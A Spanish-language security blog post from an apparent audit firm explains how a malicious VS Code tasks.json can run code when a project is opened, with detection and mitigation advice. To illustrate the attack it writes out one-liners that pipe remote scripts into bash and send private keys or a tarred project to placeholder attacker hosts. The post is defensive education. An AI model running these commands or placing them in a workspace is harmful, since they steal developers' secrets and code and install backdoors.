SECLAT - Smart Contract Security Audits
← Volver al blog
Mariano Salazar15 de abril de 2026

Ataques silenciosos contra tasks.json en VS Code: el nuevo vector que afecta Web2 y Web3

Cómo los atacantes manipulan tasks.json para ejecutar código malicioso y comprometer entornos Web2 y Web3.

El ecosistema de desarrollo moderno depende cada vez más de entornos altamente configurables como Visual Studio Code (VS Code). Sin embargo, esa misma flexibilidad ha abierto una puerta para una nueva categoría de ataques silenciosos pero extremadamente peligrosos: los scams que manipulan el archivo tasks.json dentro de la carpeta oculta .vscode.
Estos ataques afectan entornos Web2 y Web3, comprometen claves privadas, scripts de build, herramientas de node tooling, y pueden ejecutar código malicioso sin que el developer lo note.

🚨 ¿Qué es tasks.json y por qué es un vector de ataque?

VS Code permite automatizar comandos mediante tareas definidas en .vscode/tasks.json.

Ejemplo:

json
{"version": "2.0.0","tasks": [{ "label": "build", "type": "shell", "command": "npm run build" }]}

Estas tareas pueden ejecutar:

  • comandos de shell
  • scripts del sistema
  • descargas remotas
  • comandos de PowerShell o bash
💡 Un atacante puede ejecutar código sin malware, solo modificando este archivo.

🕵️‍♂️ Cómo se usa tasks.json para un ataque
1. El atacante modifica .vscode/tasks.json
2. Inyecta un task malicioso
3. VS Code ejecuta estas tareas automáticamente

Ejemplo malicioso:

json
{"label": "init","type": "shell","command": "curl -s https://malicious.com/payload.sh | bash"}

💣 ¿Qué puede hacer un atacante?
1. Robo de claves privadas Web3
grep -r "PRIVATE_KEY" . | curl -X POST https://attacker.com/steal --data-binary @-
2. Instalar backdoors persistentes
curl attacker.com/bd.sh | bash
3. Exfiltrar proyectos completos
tar cz . | curl -X POST https://attacker.com/upload --data-binary @-

🔍 Cómo detectar este ataque

  • Revisar .vscode/tasks.json
  • Buscar comandos sospechosos
  • Revisar PRs
  • YARA / Sigma rules
🧯 Cómo mitigar

🔐 1. Deshabilita tareas automáticas en VS Code (dos métodos)
VS Code permite que ciertos proyectos ejecuten tareas automáticas sin intervención directa del desarrollador.
Esto es peligroso, porque un tasks.json malicioso podría ejecutarse tan pronto como abras un proyecto o inicies el debugger.
Para evitarlo, debes configurar:

json
{"task.allowAutomaticTasks": "off"}

✅ Método 1 — Ajustarlo en la configuración del Workspace (recomendado)
Este método aplica solo al proyecto actual.
1. Abre tu proyecto en VS Code.
2. Ve a File → Preferences → Settings
3. Click en Open Settings (JSON)
4. Edita/crea .vscode/settings.json
5. Agrega:

json
{"task.allowAutomaticTasks": "off"}

✅ Método 2 — Ajustarlo en la configuración global del usuario
1. Abre la paleta de comandos (Cmd/Ctrl + Shift + P)
2. Ejecuta Preferences: Open Settings (JSON)
3. Agrega:

json
{"task.allowAutomaticTasks": "off"}

🔒 Gitignore recomendado:
.vscode
!.vscode/settings.json
!.vscode/extensions.json

🌐 3. Proteger entornos Web3

Nunca guardes claves privadas en:

  • .env
  • carpetas del proyecto
  • variables locales sin cifrado
🛡️ 4. Usar un sandbox al abrir repos desconocidos
Con devcontainers, codespaces o máquinas temporales.

🔍 5. Monitoreo con sistemas EDR
Estas herramientas detectan comportamientos como:

  • curl | bash
  • ejecución de binarios ocultos
🧠 Conclusión
El archivo .vscode/tasks.json es un vector de ataque silencioso y extremadamente peligroso.
En Web3, donde hay claves privadas, RPCs, nodos locales y seed phrases, un solo task malicioso puede comprometer todo.
Proteger tu workspace es ahora una prioridad absoluta.

SECLAT - Security & Audit

SECLAT - Expertos en seguridad blockchain y auditorías de contratos inteligentes.

Estadísticas Clave

200+
Contratos Auditados
0
Incidentes Críticos
20+
Clientes Satisfechos
$100M+
Protegidos

Contactanos

Si buscas una auditoría de seguridad o una consulta, Contactanos.

seclatseguridad@gmail.com
@SecLat_Security
© 2026 SECLAT Security. Todos los derechos reservados.